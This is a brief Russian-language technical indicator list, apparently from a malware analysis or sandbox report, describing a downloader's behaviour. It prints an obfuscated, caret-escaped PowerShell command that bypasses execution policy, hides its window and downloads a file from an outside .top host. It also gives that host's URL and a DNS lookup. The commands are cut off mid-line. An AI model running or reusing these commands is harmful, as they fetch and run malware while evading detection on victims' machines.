Техническая информация
- http://sutraponef.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOW^er^s^HelL^.ex^E^ -ExEC^ut^iO^n^PO^l^IcY b^YpAss ^-^NOP^r^OfiL^E -w^iNDOwstYl^E^ ^HID^d^e^n ^(neW-OBJE^Ct sYsT^e^m.n^e^t.wE^b^clie^NT)^.DoW^n^Lo^AD^FILE('http://sutrapo...
- DNS ASK su###ponef.top
- '<SYSTEM32>\cmd.exe' /C "pOW^er^s^HelL^.ex^E^ -ExEC^ut^iO^n^PO^l^IcY b^YpAss ^-^NOP^r^OfiL^E -w^iNDOwstYl^E^ ^HID^d^e^n ^(neW-OBJE^Ct sYsT^e^m.n^e^t.wE^b^clie^NT)^.DoW^n^Lo^AD^FILE('http://sutrapo...' (со скрытым окном)